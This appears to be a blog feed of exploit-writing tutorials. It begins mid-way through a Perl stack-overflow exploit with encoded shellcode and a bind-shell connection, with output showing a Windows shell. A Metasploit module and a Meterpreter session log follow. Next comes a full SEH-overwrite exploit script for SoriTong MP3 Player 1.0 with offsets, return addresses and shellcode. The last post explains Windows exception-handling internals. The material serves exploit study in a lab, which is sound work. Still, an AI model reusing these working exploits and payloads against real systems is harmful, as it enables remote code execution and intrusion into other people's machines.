"\x4a\x4b\x47\x39\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a\x4e" .
"\x50\x31\x49\x50\x4a\x39\x4e\x4c\x4c\x44\x49\x50\x42\x54" .
"\x45\x57\x49\x51\x48\x4a\x44\x4d\x45\x51\x48\x42\x4a\x4b" .
"\x4c\x34\x47\x4b\x46\x34\x46\x44\x51\x38\x42\x55\x4a\x45" .
"\x4c\x4b\x51\x4f\x51\x34\x43\x31\x4a\x4b\x43\x56\x4c\x4b" .
"\x44\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b" .
"\x44\x43\x46\x4c\x4c\x4b\x4b\x39\x42\x4c\x51\x34\x45\x4c" .
"\x45\x31\x49\x53\x46\x51\x49\x4b\x43\x54\x4c\x4b\x51\x53" .
"\x50\x30\x4c\x4b\x47\x30\x44\x4c\x4c\x4b\x42\x50\x45\x4c" .
"\x4e\x4d\x4c\x4b\x51\x50\x44\x48\x51\x4e\x43\x58\x4c\x4e" .
"\x50\x4e\x44\x4e\x4a\x4c\x46\x30\x4b\x4f\x4e\x36\x45\x36" .
"\x51\x43\x42\x46\x43\x58\x46\x53\x47\x42\x45\x38\x43\x47" .
"\x44\x33\x46\x52\x51\x4f\x46\x34\x4b\x4f\x48\x50\x42\x48" .
"\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x46\x30\x4b\x4f\x48\x56" .
"\x51\x4f\x4c\x49\x4d\x35\x43\x56\x4b\x31\x4a\x4d\x45\x58" .
"\x44\x42\x46\x35\x43\x5a\x43\x32\x4b\x4f\x4e\x30\x45\x38" .
"\x48\x59\x45\x59\x4a\x55\x4e\x4d\x51\x47\x4b\x4f\x48\x56" .
"\x51\x43\x50\x53\x50\x53\x46\x33\x46\x33\x51\x53\x50\x53" .
"\x47\x33\x46\x33\x4b\x4f\x4e\x30\x42\x46\x42\x48\x42\x35" .
"\x4e\x53\x45\x36\x50\x53\x4b\x39\x4b\x51\x4c\x55\x43\x58" .
"\x4e\x44\x45\x4a\x44\x30\x49\x57\x46\x37\x4b\x4f\x4e\x36" .
"\x42\x4a\x44\x50\x50\x51\x50\x55\x4b\x4f\x48\x50\x45\x38" .
"\x49\x34\x4e\x4d\x46\x4e\x4a\x49\x50\x57\x4b\x4f\x49\x46" .
"\x46\x33\x50\x55\x4b\x4f\x4e\x30\x42\x48\x4d\x35\x51\x59" .
"\x4c\x46\x51\x59\x51\x47\x4b\x4f\x49\x46\x46\x30\x50\x54" .
"\x46\x34\x50\x55\x4b\x4f\x48\x50\x4a\x33\x43\x58\x4b\x57" .
"\x43\x49\x48\x46\x44\x39\x51\x47\x4b\x4f\x4e\x36\x46\x35" .
"\x4b\x4f\x48\x50\x43\x56\x43\x5a\x45\x34\x42\x46\x45\x38" .
"\x43\x53\x42\x4d\x4b\x39\x4a\x45\x42\x4a\x50\x50\x50\x59" .
"\x47\x59\x48\x4c\x4b\x39\x4d\x37\x42\x4a\x47\x34\x4c\x49" .
"\x4b\x52\x46\x51\x49\x50\x4b\x43\x4e\x4a\x4b\x4e\x47\x32" .
"\x46\x4d\x4b\x4e\x50\x42\x46\x4c\x4d\x43\x4c\x4d\x42\x5a" .
"\x46\x58\x4e\x4b\x4e\x4b\x4e\x4b\x43\x58\x43\x42\x4b\x4e" .
"\x48\x33\x42\x36\x4b\x4f\x43\x45\x51\x54\x4b\x4f\x48\x56" .
"\x51\x4b\x46\x37\x50\x52\x50\x51\x50\x51\x50\x51\x43\x5a" .
"\x45\x51\x46\x31\x50\x51\x51\x45\x50\x51\x4b\x4f\x4e\x30" .
"\x43\x58\x4e\x4d\x49\x49\x44\x45\x48\x4e\x46\x33\x4b\x4f" .
"\x48\x56\x43\x5a\x4b\x4f\x4b\x4f\x50\x37\x4b\x4f\x4e\x30" .
"\x4c\x4b\x51\x47\x4b\x4c\x4b\x33\x49\x54\x42\x44\x4b\x4f" .
"\x48\x56\x51\x42\x4b\x4f\x48\x50\x43\x58\x4a\x50\x4c\x4a" .
"\x43\x34\x51\x4f\x50\x53\x4b\x4f\x4e\x36\x4b\x4f\x48\x50" .
"\x41\x41";
# initialize host and port
my $host = shift || '192.168.10.130';
my $port = shift || 200;
my $proto = getprotobyname('tcp');
# get the port address
my $iaddr = inet_aton($host);
my $paddr = sockaddr_in($port, $iaddr);
print "[+] Setting up socket\n";
# create the socket, connect to the port
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
print "[+] Connecting to $host on port $port\n";
connect(SOCKET, $paddr) or die "connect: $!";
print "[+] Sending payload\n";
print SOCKET $junk.$eipoverwrite.$shellcode."\n";
print "[+] Payload sent\n";
print "[+] Attempting to telnet to $host on port 5555...\n";
system("telnet $host 5555");
close SOCKET or die "close: $!";
</code></pre></div></div>
<p>The output is as follows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@kali:~# perl sploit.pl 192.168.10.130 200
--------------------------------------
Writing Buffer Overflows
Peter Van Eeckhoutte
http://www.corelan.be:8800
--------------------------------------
Exploit for vulnserver.c
--------------------------------------
[+] Setting up socket
[+] Connecting to 192.168.10.130 on port 200
[+] Sending payload
[+] Payload sent
[+] Attempting to telnet to 192.168.10.130 on port 5555...
Trying 192.168.10.130...
Connected to 192.168.10.130.
Escape character is '^]'.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
D:\Program Files\Microsoft Visual Studio\MyProjects\server\Debug>dir
dir
Volume in drive D has no label.
Volume Serial Number is 0EAA-0461
Directory of D:\Program Files\Microsoft Visual Studio\MyProjects\server\Debug
2014-04-07 17:22 <DIR> .
2014-04-07 17:22 <DIR> ..
2014-04-07 16:56 172,124 server.exe
2014-04-07 16:56 185,136 server.ilk
2014-04-07 16:56 25,594 server.obj
2014-04-07 17:22 43,520 server.opt
2014-04-07 16:56 203,728 server.pch
2014-04-07 16:56 353,280 server.pdb
2014-04-07 16:56 2,203 StdAfx.obj
2014-04-07 17:23 91,136 vc60.idb
2014-04-07 16:56 135,168 vc60.pdb
9 File(s)      1,211,889 bytes
2 Dir(s)  16,896,925,696 bytes free
</code></pre></div></div>
<p>We successfully obtained a shell on the vulnerable server.</p>
<p>Finally, we convert the exploit into a Metasploit module. The code is given below; a careful study of how such modules are written is left for later.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#
#
# Custom metasploit exploit for vulnserver.c
# Written by Peter Van Eeckhoutte
#
#
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Custom vulnerable server stack overflow',
'Description' => %q{
This module exploits a stack overflow in a
custom vulnerable server.
},
'Author' => [ 'Terenceli ' ],
'Version' => '$Revision: 9999 $',
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1400,
'BadChars' => "\x00\xff",
},
'Platform' => 'win',
'Targets' =>
[
['Windows XP SP3 CHS',
{ 'Ret' => 0x71a22b53, 'Offset' => 504 } ],
['Windows 2003 Server R2 SP2',
{ 'Ret' => 0x71c02b67, 'Offset' => 504 } ],
],
'DefaultTarget' => 0,
'Privileged' => false
))
register_options(
[
Opt::RPORT(200)
], self.class)
end
def exploit
connect
junk = make_nops(target['Offset'])
sploit = junk + [target.ret].pack('V') + make_nops(50) + payload.encoded
sock.put(sploit)
handler
disconnect
end
end
</code></pre></div></div>
<p>Testing against Windows XP SP3:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>msf exploit(server) > set RHOST 192.168.10.130
RHOST => 192.168.10.130
msf exploit(server) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(server) > exploit
[*] Started bind handler
[*] Sending stage (769024 bytes) to 192.168.10.130
[*] Meterpreter session 2 opened (192.168.10.129:50459 -> 192.168.10.130:4444) at 2014-04-07 20:46:05 +0800
meterpreter > sysinfo
Computer : CHINA-CE09C2DA6
OS : Windows XP (Build 2600, Service Pack 3).
Architecture : x86
System Language : zh_CN
Meterpreter : x86/win32
</code></pre></div></div>
Exploit writing notes 2: SEH-based exploits2014-04-07T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2014/04/07/seh-exploit
<p>This is the second note on exploit writing, covering SEH-based exploits. The principles of SEH were explained in detail in a previous post and are not repeated here. The example this time is a vulnerability in SoriTong MP3 Player 1.0; the program can be downloaded here: <a href="/assets/file/seh-exploit/soritong10.exe">soritong10.exe</a>.</p>
<p>The vulnerability is that a malformed skin file causes an overflow. We use Python to create a ui.txt file and place it in the skin\default folder:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>file = "ui.txt"
junk = "A" * 5000
f = open(file,'w')
f.write(junk)
f.close()
</code></pre></div></div>
<p>Opening SoriTong MP3 Player, we see it crash silently. Examining the SEH record in WinDbg, both the prev and handler fields have been overwritten with our 'A's.</p>
<p><img src="/assets/img/sehexploit/1.png" alt="" /></p>
<p>When an exception occurs, execution jumps to the SEH handler. By setting this handler to the address of a pop/pop/ret sequence in one of the program's own modules, we can make execution land on the next-SEH pointer; all that remains to do at next SEH is jump to the shellcode. The Corelan tutorial describes this as raising a second exception, but I don't think so: the ret simply pops the address of next SEH into EIP. The payload layout is roughly as follows:</p>
<p>[junk][next seh][seh][shellcode]</p>
<p>Here next seh holds an instruction that jumps to the shellcode, and seh holds a pop/pop/ret address from one of the program's own modules.</p>
<p>Using mona's pattern, we find that the SE handler is overwritten at offset 588. The opcode of a short jmp is eb, followed by the jump displacement, so a short jmp that skips 6 bytes is encoded as eb 06. We therefore overwrite next seh with 0xeb,0x06,0x90,0x90.</p>
<p>Searching for pop pop ret instructions:</p>
<p><img src="/assets/img/sehexploit/2.png" alt="" /></p>
<p><img src="/assets/img/sehexploit/3.png" alt="" /></p>
<p>In other words, the SE handler is overwritten after 588 bytes, so next seh is overwritten after 584 bytes.</p>
<p>Next, we look for a pop/pop/ret address:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0:000> lm
start end module name
00400000 004de000 SoriTong C (export symbols) C:\Program Files\SoriTong\SoriTong.exe
010d0000 0111f000 DRMClien (deferred)
10000000 10094000 Player (deferred)
42100000 42129000 wmaudsdk (deferred)
5adc0000 5adf7000 uxtheme (deferred)
5bd10000 5bd50000 strmdll (deferred)
5d170000 5d20a000 COMCTL32 (deferred)
62c20000 62c29000 LPK (deferred)
0:000> s 10000000 10094000 5f 5e c3
1000e0d2 5f 5e c3 8b 47 78 85 c0-75 05 33 c0 5f 5e c3 8b _^..Gx..u.3._^..
1000e0de 5f 5e c3 8b 07 8b cf ff-10 8b f0 85 f6 7c 07 8b _^...........|..
1000e0f6 5f 5e c3 cc cc cc cc cc-cc cc 53 56 57 8b f1 55 _^........SVW..U
100106fb 5f 5e c3 cc cc 8b 44 24-08 8b 54 24 04 50 8b 49 _^....D$..T$.P.I
10010cab 5f 5e c3 cc cc 41 e8 6a-fe ff ff a8 01 74 05 d1 _^...A.j.....t..
100116fd 5f 5e c3 56 8b f1 8d 89-1c 8a 04 00 e8 82 74 ff _^.V..........t.
1001263d 5f 5e c3 55 8b ec 57 56-8b 75 0c 8b 7d 08 8b 4d _^.U..WV.u..}..M
100127f8 5f 5e c3 cc cc cc cc cc-8b 44 24 04 56 57 8b d0 _^.......D$.VW..
1001281f 5f 5e c3 cc cc cc cc cc-cc cc cc cc cc cc cc cc _^..............
10012984 5f 5e c3 cc cc cc cc cc-cc cc cc cc 8b 44 24 04 _^...........D$.
...
</code></pre></div></div>
<p>We pick one arbitrarily, say 10012984.</p>
<p>A word on why pop pop ret works: when an exception occurs, the exception dispatcher creates its own stack frame and pushes the arguments of the EH handler onto that new frame. One of the fields in the EH structure is EstablisherFrame, which points to the exception registration record (i.e. next seh) and is pushed onto the stack; at the time the handler function is called, this value sits at ESP+8. After a pop pop ret, the address of next seh therefore ends up in EIP.</p>
<p>The final payload is:</p>
<p>junk: 584 bytes of 'A'</p>
<p>next seh: "\xeb\x06\x90\x90"</p>
<p>seh: "\x84\x29\x01\x10"</p>
<p>shellcode: any functional payload; here an arbitrary one that pops the calculator</p>
<p>Some junk data is appended at the end.</p>
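The layout can be checked mechanically. Below is a hedged Python sketch that builds the buffer using the pop/pop/ret address 0x10012984 picked earlier (note the final script in this post actually uses a different p/p/r address from the same module) and a placeholder instead of real shellcode:

```python
import struct

def jmp_short(disp):
    # EB xx: short relative jump; the displacement is a signed byte
    # counted from the end of the 2-byte instruction
    return b'\xeb' + struct.pack('b', disp)

junk     = b'A' * 584
next_seh = jmp_short(6) + b'\x90\x90'     # eb 06 90 90: hop over seh
seh      = struct.pack('<I', 0x10012984)  # pop/pop/ret in Player.dll
payload  = junk + next_seh + seh + b'SHELLCODE'  # placeholder payload

assert payload[584:588] == b'\xeb\x06\x90\x90'   # next seh at offset 584
assert payload[588:592] == b'\x84\x29\x01\x10'   # se handler at offset 588
```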
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>name = "ui.txt"
data = "A" * 584
nextseh = "\xeb\x06\x90\x90"
seh = "\xe8\x8d\x01\x10"
shellcode = ("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
"\x42\x30\x42\x50\x42\x30\x4b\x38\x45\x54\x4e\x33\x4b\x58\x4e\x37"
"\x45\x50\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x4a\x41\x4b\x48"
"\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x34\x4b\x38\x46\x43\x4b\x48"
"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x48\x42\x4c"
"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x43\x46\x35\x46\x42\x46\x30\x45\x47\x45\x4e\x4b\x48"
"\x4f\x35\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x58\x4e\x30\x4b\x54"
"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x31\x4b\x48"
"\x41\x30\x4b\x4e\x49\x38\x4e\x45\x46\x52\x46\x30\x43\x4c\x41\x43"
"\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x53\x45\x38\x42\x4c\x4a\x57"
"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x48\x42\x37\x4e\x51\x4d\x4a"
"\x4b\x58\x4a\x56\x4a\x50\x4b\x4e\x49\x30\x4b\x38\x42\x38\x42\x4b"
"\x42\x50\x42\x30\x42\x50\x4b\x58\x4a\x46\x4e\x43\x4f\x35\x41\x53"
"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x37"
"\x42\x35\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x4a\x46\x4a\x49"
"\x50\x4f\x4c\x58\x50\x30\x47\x45\x4f\x4f\x47\x4e\x43\x36\x41\x46"
"\x4e\x36\x43\x46\x42\x50\x5a")
junk2="\x90" * 1000;
data = data + nextseh + seh + shellcode + junk2
f = open(name,'w')
f.write(data)
f.close()
</code></pre></div></div>
<p>Placing ui.txt in skin/default and launching the program again, the calculator pops up.</p>
Windows user-mode exception handling2014-03-31T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2014/03/31/windows-user-exception
<ul>
<li><a href="#第一节">Windows exception dispatching</a></li>
<li><a href="#第二节">The OS-provided SEH mechanism</a></li>
<li><a href="#第三节">Compiler-level SEH</a></li>
<li><a href="#第四节">Unwinding</a></li>
</ul>
<p>Windows exception handling has been discussed in plenty of articles already; here I summarize the work of others and keep a record for myself. To make things easier to follow, I will walk through the whole path from the moment an exception occurs to the execution of our own exception handler.</p>
<h3 id="第一节">1. Windows exception dispatching</h3>
<p>In protected mode, when an interrupt or exception occurs, the CPU enters the kernel through the IDT to find a handler. For example, executing a divide-by-zero transfers execution to the address registered in the first IDT entry (nt!KiTrap00), and accessing a non-existent memory page transfers it to nt!KiTrap0E. The IDT as seen in WinDbg:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kd> !idt -a
Dumping IDT: 8003f400
9d120e4800000000: 804e0360 nt!KiTrap00
9d120e4800000001: 804e04db nt!KiTrap01
9d120e4800000002: Task Selector = 0x0058
9d120e4800000003: 804e08ad nt!KiTrap03
9d120e4800000004: 804e0a30 nt!KiTrap04
9d120e4800000005: 804e0b91 nt!KiTrap05
9d120e4800000006: 804e0d12 nt!KiTrap06
9d120e4800000007: 804e137a nt!KiTrap07
9d120e4800000008: Task Selector = 0x0050
9d120e4800000009: 804e179f nt!KiTrap09
9d120e480000000a: 804e18bc nt!KiTrap0A
9d120e480000000b: 804e19f9 nt!KiTrap0B
9d120e480000000c: 804e1c52 nt!KiTrap0C
9d120e480000000d: 804e1f48 nt!KiTrap0D
</code></pre></div></div>
<p>KiTrap00 usually only characterizes and describes the exception. To support debuggers and application-defined exception handlers, the system must dispatch the exception to the debugger or to the application's handler functions. For software exceptions, Windows dispatches and handles them in the same unified way as CPU exceptions; the key function is nt!KiDispatchException.</p>
<p><img src="/assets/img/exception/1.png" alt="" /></p>
<p>The prototype of KiDispatchException is:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>VOID KiDispatchException(IN PEXCEPTION_RECORD ExceptionRecord,
IN PKEXCEPTION_FRAME ExceptionFrame,
IN PKTRAP_FRAME TrapFrame,
IN KPROCESSOR_MODE PreviousMode,
IN BOOLEAN FirstChance
)
</code></pre></div></div>
<p>ExceptionRecord describes the exception and is defined as follows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> typedef struct _EXCEPTION_RECORD {
NTSTATUS ExceptionCode;
ULONG ExceptionFlags;
struct _EXCEPTION_RECORD *ExceptionRecord;
PVOID ExceptionAddress;
ULONG NumberParameters;
ULONG_PTR ExceptionInformation[EXCEPTION_MAXIMUM_PARAMETERS];
} EXCEPTION_RECORD;
</code></pre></div></div>
<p>On x86, ExceptionFrame is always NULL. The TrapFrame parameter describes the processor state at the time of the exception, including the general-purpose, debug, and segment registers. It is defined as follows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> typedef struct _KTRAP_FRAME {
ULONG DbgEbp;
ULONG DbgEip;
ULONG DbgArgMark;
ULONG DbgArgPointer;
ULONG TempSegCs;
ULONG TempEsp;
ULONG Dr0;
ULONG Dr1;
ULONG Dr2;
ULONG Dr3;
ULONG Dr6;
ULONG Dr7;
ULONG SegGs;
ULONG SegEs;
ULONG SegDs;
ULONG Edx;
ULONG Ecx;
ULONG Eax;
ULONG PreviousPreviousMode;
PEXCEPTION_REGISTRATION_RECORD ExceptionList;
ULONG SegFs;
ULONG Edi;
ULONG Esi;
ULONG Ebx;
ULONG Ebp;
ULONG ErrCode;
ULONG Eip;
ULONG SegCs;
ULONG EFlags;
ULONG HardwareEsp;
ULONG HardwareSegSs;
ULONG V86Es;
ULONG V86Ds;
ULONG V86Fs;
ULONG V86Gs;
} KTRAP_FRAME;
</code></pre></div></div>
<p>PreviousMode is an enumeration indicating whether the code that triggered the exception was running in user mode or kernel mode. FirstChance indicates whether this is the first round of dispatching this exception; Windows dispatches an exception at most twice. Figure 2 shows the basic flow of KiDispatchException.</p>
<p><img src="/assets/img/exception/2.png" alt="" /></p>
<p>Here we only consider user-mode exceptions that the debugger does not handle. KiDispatchException copies the CONTEXT and EXCEPTION_RECORD structures onto the user-mode stack, then stores the kernel variable KeUserExceptionDispatcher into the eip field of the KTRAP_FRAME; this value is the address of the KiUserExceptionDispatcher function. It then executes iret to return to user space. In WinDbg we see:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kd> dd KeUserExceptionDispatcher
8055b310 7c92e47c 7c92e460 7c92e450 0002625a
8055b320 00000000 00000000 00000000 00000000
</code></pre></div></div>
<p>We can see that KeUserExceptionDispatcher holds 0x7c92e47c, which matches what OllyDbg shows.</p>
<p>Back in user mode, KiUserExceptionDispatcher finds exception handlers by calling RtlDispatchException.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> KiUserExceptionDispatcher( PEXCEPTION_RECORD pExcptRec, CONTEXT *pContext )
{
DWORD retValue;
// Note: If the exception is handled, RtlDispatchException() never returns
if ( RtlDispatchException( pExceptRec, pContext ) )
retValue = NtContinue( pContext, 0 );
else
retValue = NtRaiseException( pExceptRec, pContext, 0 );
EXCEPTION_RECORD excptRec2;
excptRec2.ExceptionCode = retValue;
excptRec2.ExceptionFlags = EXCEPTION_NONCONTINUABLE;
excptRec2.ExceptionRecord = pExcptRec;
excptRec2.NumberParameters = 0;
RtlRaiseException( &excptRec2 );
}
</code></pre></div></div>
<p>The job of RtlDispatchException is to find the head node of the exception handler list registered in the Thread Information Block (TIB), then visit each node in turn and call its handler function, until some handler handles the exception or the end of the list is reached. This is where the SEH mechanism comes in.</p>
<h3 id="第二节">2. The OS-provided SEH mechanism</h3>
<p>RtlDispatchException calls the exception handlers registered in user space. The prototype of this callback is:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>EXCEPTION_DISPOSITION
__cdecl _except_handler(
struct _EXCEPTION_RECORD *ExceptionRecord,
void * EstablisherFrame,
struct _CONTEXT *ContextRecord,
void * DispatcherContext
);
</code></pre></div></div>
<p>Of these parameters, ExceptionRecord and ContextRecord are the structures copied from kernel mode onto the user-mode stack; EstablisherFrame is the stack frame of the function that established (registered) the exception handler; DispatcherContext is a pointer that is only meaningful for the temporary protection node used during nested exceptions.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>typedef enum _EXCEPTION_DISPOSITION {
ExceptionContinueExecution,
ExceptionContinueSearch,
ExceptionNestedException,
ExceptionCollidedUnwind
} EXCEPTION_DISPOSITION;
</code></pre></div></div>
<p>The OS decides what to do next based on the handler's return value.</p>
<p>This is getting close to the compiler's SEH support, but let me first cover the OS mechanism. As mentioned, RtlDispatchException finds the head of the exception handler list through the TIB; this is done via fs:[0], since fs always points to the TEB of the current thread and the TIB sits at the beginning of the TEB. Let's look at the TIB structure first:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kd> dt ntdll!_NT_TIB
+0x000 ExceptionList : Ptr32 _EXCEPTION_REGISTRATION_RECORD
+0x004 StackBase : Ptr32 Void
+0x008 StackLimit : Ptr32 Void
+0x00c SubSystemTib : Ptr32 Void
+0x010 FiberData : Ptr32 Void
+0x010 Version : Uint4B
+0x014 ArbitraryUserPointer : Ptr32 Void
+0x018 Self : Ptr32 _NT_TIB
</code></pre></div></div>
<p>We see that the first field is an _EXCEPTION_REGISTRATION_RECORD pointer:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kd> dt ntdll!_EXCEPTION_REGISTRATION_RECORD
+0x000 Next : Ptr32 _EXCEPTION_REGISTRATION_RECORD
+0x004 Handler : Ptr32 _EXCEPTION_DISPOSITION
</code></pre></div></div>
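The two-field record is easy to visualize by walking a chain laid out in memory. The sketch below parses a hypothetical serialized chain (all addresses are invented for illustration); the list is terminated by Next == 0xFFFFFFFF, just as the fs:[0] chain ends with -1:

```python
import struct

def walk_seh_chain(mem, head):
    # mem maps record address -> 8 raw bytes {Next, Handler}, both
    # little-endian DWORDs, as in _EXCEPTION_REGISTRATION_RECORD
    handlers = []
    addr = head
    while addr != 0xFFFFFFFF:
        nxt, handler = struct.unpack('<II', mem[addr])
        handlers.append(handler)
        addr = nxt
    return handlers

# Hypothetical chain rooted at fs:[0]: two frames registered by the
# application, then a process-wide default handler
mem = {
    0x0012FF40: struct.pack('<II', 0x0012FFB0, 0x00401430),
    0x0012FFB0: struct.pack('<II', 0x0012FFE0, 0x00401430),
    0x0012FFE0: struct.pack('<II', 0xFFFFFFFF, 0x7C839AC0),
}
assert walk_seh_chain(mem, 0x0012FF40) == [0x00401430, 0x00401430, 0x7C839AC0]
```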
<p>The first member is the address of the next _EXCEPTION_REGISTRATION_RECORD, and the second is an exception handler function.</p>
<p>To summarize briefly, the steps for executing a user-registered exception handler are: after the exception occurs and control returns to user mode, RtlDispatchException looks for user-registered handlers. It first obtains the ExceptionList field through fs:[0], then walks this list looking for an EXCEPTION_REGISTRATION structure whose callback (the exception handler) agrees to handle the exception. In the MYSEH.CPP example, the handler signals agreement by returning ExceptionContinueExecution. A callback may also decline to handle the exception; in that case the system moves to the next EXCEPTION_REGISTRATION structure in the list and asks its callback whether it is willing to handle the exception. Figure 3 shows this process.</p>
<p><img src="/assets/img/exception/3.png" alt="" /></p>
<p>Here is an example that registers and unregisters an exception handler by hand:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include "stdafx.h"
//==================================================
// MYSEH - Matt Pietrek 1997
// Microsoft Systems Journal, January 1997
// FILE: MYSEH.CPP
// To compile: CL MYSEH.CPP
//==================================================
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <stdio.h>
DWORD scratch;
EXCEPTION_DISPOSITION
__cdecl
_except_handler(
struct _EXCEPTION_RECORD *ExceptionRecord,
void * EstablisherFrame,
struct _CONTEXT *ContextRecord,
void * DispatcherContext )
{
unsigned i;
// Indicate that we made it to our exception handler
printf( "Hello from an exception handler\n" );
// Change EAX in the context record so that it points to someplace
// where we can successfully write
ContextRecord->Eax = (DWORD)&scratch;
// Tell the OS to restart the faulting instruction
return ExceptionContinueExecution;
}
int main()
{
DWORD handler = (DWORD)_except_handler;
__asm
{
// Build the EXCEPTION_REGISTRATION structure:
push handler // address of the handler function
push FS:[0] // address of the previous registration record
mov FS:[0],ESP // install the new EXCEPTION_REGISTRATION structure
}
__asm
{
mov eax,0 // zero EAX
mov [eax], 1 // write to the memory EAX points to, deliberately raising a fault
}
printf( "After writing!\n" );
__asm
{
// Remove our EXCEPTION_REGISTRATION record
mov eax,[ESP] // get the previous record
mov FS:[0], EAX // install the previous record
add esp, 8 // pop the EXCEPTION_REGISTRATION off the stack
}
return 0;
}
</code></pre></div></div>
<p>The code needs little explanation: we manually push a handler, then trigger an exception; control enters our handler and, after handling, execution returns to the original flow.</p>
<p>What we have just seen is the operating system's support for SEH, presented to illustrate the basic principle of registering and unregistering SEH handlers. Clearly, writing Windows programs this way would be cumbersome: first, we would have to write handlers matching the SehHandler prototype; second, we would have to manipulate the stack pointer directly. Normally we simply use __try{} __except() to register an exception handler. That is the compiler's SEH support.</p>
<h3 id="第三节">3. Compiler-level SEH</h3>
<p>Let's look at compiler-level SEH through an example; the example program can be downloaded here: <a href="/assets/file/exception/sehtes.cpp">sehtes.cpp</a></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>1 119: int main()
2 120: {
3 00401280 push ebp
4 00401281 mov ebp,esp
5 00401283 push 0FFh
6 00401285 push offset string "Caught Exception in main\n"+24h (00422130)
7 0040128A push offset __except_handler3 (00401430)
8 0040128F mov eax,fs:[00000000]
9 00401295 push eax
10 00401296 mov dword ptr fs:[0],esp
11 0040129D add esp,0B4h
12 004012A0 push ebx
13 004012A1 push esi
14 004012A2 push edi
15 004012A3 mov dword ptr [ebp-18h],esp
16 004012A6 lea edi,[ebp-5Ch]
17 004012A9 mov ecx,11h
18 004012AE mov eax,0CCCCCCCCh
19 004012B3 rep stos dword ptr [edi]
20 121: int i;
21 122: // Two (non-nested) __try blocks, which causes two elements to be generated for the scopetable array
22 123: __try
23 004012B5 mov dword ptr [ebp-4],0
24 124: {
25 125: i = 0x1234;
26 004012BC mov dword ptr [ebp-1Ch],1234h
27 126:
28 127: } __except( EXCEPTION_EXECUTE_HANDLER )
29 004012C3 mov dword ptr [ebp-4],0FFFFFFFFh
30 004012CA jmp $L17074+17h (004012e9)
31 $L17073:
32 004012CC mov eax,1
33 $L17075:
34 004012D1 ret
35 $L17074:
36 004012D2 mov esp,dword ptr [ebp-18h]
37 128: {
38 129: printf("div0 occur!\n");
39 004012D5 push offset string "div0 occur!\n" (004230c4)
40 004012DA call printf (00401370)
41 004012DF add esp,4
42 130: }
43 004012E2 mov dword ptr [ebp-4],0FFFFFFFFh
44 131: __try
45 004012E9 mov dword ptr [ebp-4],1
46 132: {
47 133: Function1(); // 调用一个设置更多异常帧的函数
48 004012F0 call @ILT+15(Function1) (00401014)
49 134: } __except( EXCEPTION_EXECUTE_HANDLER )
50 004012F5 mov dword ptr [ebp-4],0FFFFFFFFh
51 004012FC jmp $L17078+17h (0040131b)
52 $L17077:
53 004012FE mov eax,1
54 $L17079:
55 00401303 ret
56 $L17078:
57 00401304 mov esp,dword ptr [ebp-18h]
58 135: {
59 136: // Should never get here, since we do not intend to raise any exception
60 137: printf( "Caught Exception in main\n" );
61 00401307 push offset string "Caught Exception in main\n" (0042210c)
62 0040130C call printf (00401370)
63 00401311 add esp,4
64 138: }
65 00401314 mov dword ptr [ebp-4],0FFFFFFFFh
66 139: return 0;
67 0040131B xor eax,eax
68 140: }
69 0040131D mov ecx,dword ptr [ebp-10h]
